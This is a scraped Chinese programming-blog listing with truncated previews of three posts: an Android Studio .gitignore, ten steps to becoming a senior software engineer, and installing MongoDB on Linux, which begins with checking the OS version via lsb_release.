  自己用的Android Studio下项目的.gitignore文件,对github上的android.gitignore添加了 
      # OSX files      //mac os下      .DS_Store 
    
                                
    • 
                                
  • 成为高级程序员的10个步骤
                                    tomcat_oracle
编程
                                    
    What 
软件工程师的职业生涯要历经以下几个阶段:初级、中级,最后才是高级。这篇文章主要是讲如何通过 10 个步骤助你成为一名高级软件工程师。 
  
Why 
 
  得到更多的报酬!因为你的薪水会随着你水平的提高而增加  
  提升你的职业生涯。成为了高级软件工程师之后,就可以朝着架构师、团队负责人、CTO 等职位前进  
  历经更大的挑战。随着你的成长,各种影响力也会提高。  
    
                                
    • 
                                
  • mongdb在linux下的安装
                                    xtuhcy
mongodblinux
                                    
    一、查询linux版本号: 
lsb_release -a  
LSB Version:    :base-4.0-amd64:base-4.0-noarch:core-4.0-amd64:core-4.0-noarch:graphics-4.0-amd64:graphics-4.0-noarch:printing-4.0-amd64:printing-4.0-noa
    
                                
    •